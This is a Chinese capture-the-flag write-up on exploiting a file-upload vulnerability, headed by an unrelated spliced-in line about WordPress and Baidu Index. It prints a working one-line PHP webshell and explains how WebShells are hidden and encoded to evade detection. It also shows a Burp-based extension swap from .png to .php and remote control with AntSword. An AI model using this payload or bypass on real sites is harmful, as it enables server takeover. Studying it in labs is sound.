wordpress做論壇網(wǎng)站百度指數(shù)網(wǎng)址是多少
第一次做木馬題目,有點(diǎn)懵逼,浮現(xiàn)一下做題思路
可以上傳一個(gè)文件,通過學(xué)習(xí)學(xué)習(xí)到了一句話木馬
一句話木馬:
利用文件上傳漏洞,往目標(biāo)網(wǎng)站中上傳一句話木馬,然后你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個(gè)網(wǎng)站目錄。@表示后面即使執(zhí)行錯(cuò)誤,也不報(bào)錯(cuò)。eval()函數(shù)表示括號(hào)內(nèi)的語句字符串什么的全都當(dāng)做代碼執(zhí)行。$_POST['attack']表示從頁面中獲得attack這個(gè)參數(shù)值。
文件上傳漏洞是指網(wǎng)絡(luò)攻擊者上傳了一個(gè)可執(zhí)行的文件到服務(wù)器并執(zhí)行。這里上傳的文件可以是木馬,病毒,惡意腳本或者 WebShell 等。這種攻擊方式是最為直接和有效的,部分文件上傳漏洞的利用技術(shù)門檻非常的低,對(duì)于攻擊者來說很容易實(shí)施。
Webshell簡述
WebShell 就是以 asp、php、jsp 或者 cgi 等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱之為一種網(wǎng)頁后門。攻擊者在入侵了一個(gè)網(wǎng)站后,通常會(huì)將這些 asp 或 php 后門文件與網(wǎng)站服務(wù)器 web 目錄下正常的網(wǎng)頁文件混在一起,然后使用瀏覽器來訪問這些后門,得到一個(gè)命令執(zhí)行環(huán)境,以達(dá)到控制網(wǎng)站服務(wù)器的目的(可以上傳下載或者修改文件,操作數(shù)據(jù)庫,執(zhí)行任意命令等)。
WebShell 后門隱蔽較性高,可以輕松穿越防火墻,訪問 WebShell 時(shí)不會(huì)留下系統(tǒng)日志,只會(huì)在網(wǎng)站的 web 日志中留下一些數(shù)據(jù)提交記錄,沒有經(jīng)驗(yàn)的管理員不容易發(fā)現(xiàn)入侵痕跡。攻擊者可以將 WebShell 隱藏在正常文件中并修改文件時(shí)間增強(qiáng)隱蔽性,也可以采用一些函數(shù)對(duì) WebShell 進(jìn)行編碼或者拼接以規(guī)避檢測。除此之外,通過一句話木馬的小馬來提交功能更強(qiáng)大的大馬可以更容易通過應(yīng)用本身的檢測,<?php eval($_POST[a]); ?>就是一個(gè)最常見最原始的小馬。
這個(gè)差不多就是基礎(chǔ)知識(shí),這個(gè)網(wǎng)頁只要上傳圖片文件,別的不能上傳
1.使用burp抓包
2.將一句話木馬后綴寫成.png
上傳
將不可見改為1234.php文件,burpsuite點(diǎn)擊forword上傳以后一句話木馬就上傳成功了,觀察上傳木馬的后綴名可以得到該后綴名為php,說明修改成功了。
成功了
4.使用螞劍來遠(yuǎn)程鏈接
添加數(shù)據(jù)
輸入U(xiǎn)RL地址和密碼(123)
鏈接成功,
找到flag